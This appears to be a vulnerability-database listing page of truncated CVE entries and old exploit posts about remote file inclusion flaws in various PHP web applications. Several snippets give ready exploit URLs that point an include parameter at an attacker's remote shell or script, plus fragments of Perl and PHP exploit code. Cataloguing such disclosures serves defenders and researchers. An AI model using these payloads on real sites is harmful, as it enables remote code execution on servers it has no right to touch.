CVE-2024-20405

A vulnerability in the web-based management interface of Cisco Finesse could allow an unauthenticated, remote attacker to conduct a stored XSS attack by exploiting an RFI vulnerability. This vulnerability is due to insufficient validation of user-supplied input for specific HTTP requests that are...

Remote file inclusion

A remote file inclusion RFI vulnerability in Simple College Website v1.0 allows attackers to execute arbitrary code via a crafted PHP file. This vulnerability is exploitable when the directive allowurlinclude is set to On...

Newsletter Tailor 0.2.0 - RFI Vulnerability

No description provided by source...

iManage CMS <= 4.0.12 (absolute_path) Remote File Inclusion

No description provided by source...

Monster Top List <= 1.4.2 (functions.php root_path) RFI Exploit

No description provided by source. !/usr/bin/perl Monster Top List = 1.4.2 remote Command Execution Vulnerabilities Risk : High Remote Code Execution Url: http://www.monstertoplist.com Exploit: http://site.com/path/sources/functions.php?rootpath=EvilScript coded and f0und3d by fluffybunny Romania...

Pagetool CMS <= 1.07 (pt_upload.php) Remote File Include Vulnerability

No description provided by source. !usr/bin/perl use LWP::UserAgent; / \ / \ | | | | | | | | | | | / | | | | | | | ' / | | ' \ / \ | | | | || | || | | | \ | | | | / | , |/ /|| ||| |||| / | |/ ===========================INFO==================================== Impact level: HIGH Google:...

MassMirror Uploader Multiple RFI Exploit

======================================== MassMirror Uploader Multiple RFI Exploit ======================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' /' / /' 0 0 /, // ,/ / 1 1 // /' / // /' / /' 0 0 / / / / / / 1 1 / / 0 0 ////// // // // //...

FestOs &lt;= 2.2.1 Multiple RFI Exploit

No description provided by source. Exploit Title: FestOs = 2.2.1 Multiple RFI Exploit Date: 19-12-2009 Author: cr4wl3r Software Link: http://code.google.com/p/festos/downloads/list Version: N/A Tested on: GNU/LINUX Code : reportsplacement.php ?php $title = "Jury Sheet Report";...

FestOs <= 2.2.1 Multiple RFI Exploit

Exploit for unknown platform in category web applications ==================================== FestOs $reports header"Location:index.php"; include "includes/reportheader.php"; ? 3xplo!t : festospath/admin/reportsplacement.php?ABSOLUTEFILEPATH=Shell Code : FestOS.php...

Ptag 4.0.0 - Multiple Remote File Inclusions

Ptag 4.0.0 - Multiple Remote File Inclusions Exploit Title: Ptag sqltable = ptagprefix."session"; $this - cookiename = ptagprefix."session"; //If RSS mode, switch session to non-viewed tracker. if ptagoutput == "rss" parent::construct$ptagsql, sha1""; else parent::construct$ptagsql; ? PoC...

SaurusCMS &lt;= 4.6.4 Multiple RFI Exploit

No description provided by source. Exploit Title: SaurusCMS = 4.6.4 Multiple RFI Exploit Date: 19-12-2009 Author: cr4wl3r Software Link: http://www.saurus.info Version: N/A Tested on: GNU/LINUX Code class.writeexcelworkbook.inc.php global $classpath; requireonce...

YAP 1.1 Remote / Local File Inclusion

YAP v1.1 Remote/Local File Inclusion Vulnerabilities AUTHOR : Alkindiii CONTACT : Alkindiii 4T islamway D0T net HOME : http://www.soqor.net Script : YAP Version : 1.1 Download : http://wildmary.net-sauvage.com/share/yap1.1.tar.gz RFI EXPLOIT : http://www.site.com/index.php?page=RFI LFI EXPLOIT :...

wotw <= 5.0 Local/Remote File Inclusion Vulnerability

Exploit for unknown platform in category web applications ===================================================== wotw = 5.0 Local/Remote File Inclusion Vulnerability ===================================================== :::::::-. ... ::::::. :::. ;;, ';, ;; ;;;;;;;, ;;; ' . ' $$, $$$$ $$$ $$$ "Y$c...

sandbox-rfi.txt

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Script : sandbox 1.4.1 Discovered By : F10 Contact : [email protected] Site : http://by-f10.com Greetz : byemR3 , H0tturk , TaRanTuLa , gsy , ercu145 , LupuS , m0sted , CyberGhost ... . From : Turkey Downloa...

adrevenue script &#40;CyKuH.com&#41;&gt;&gt; RFI

+++++++ name & version :adrevenue vendor: CyKuH.com by : www.hackerz.ir userz,s3rv3rhack3r,saeidonlylinux,farzad exploit: http://victim/settings.php?Pincludes=http://shell ++++++...

Monster Top List &lt;= 1.4.2 (functions.php root_path) RFI Exploit

No description provided by source. !/usr/bin/perl Monster Top List = 1.4.2 remote Command Execution Vulnerabilities Risk : High Remote Code Execution Url: http://www.monstertoplist.com Exploit: http://site.com/path/sources/functions.php?rootpath=EvilScript coded and f0und3d by fluffybunny Romania...

STWC-Counter <= 3.4.0 (downloadcounter.php) RFI Exploit

Exploit for unknown platform in category web applications ======================================================= STWC-Counter = 3.4.0 downloadcounter.php RFI Exploit ======================================================= ?php //File Inclusion Exploit for STWC-Counter = 3.4.0.0 //| //Vendor:...

Categories hierarchy phpBB Mod 2.1.2 (phpbb_root_path) RFI Exploit

No description provided by source. C xoron Name: Categories hierarchy v2.1.2 phpbbrootpath Remote File Include Exploit Script name: Ptifo mod-CH212installed Author: xoron Exploit coded by xoron Download: http://sourceforge.net/project/showfiles.php?groupid=125710 xoron.biz - xoron.info Thanx:...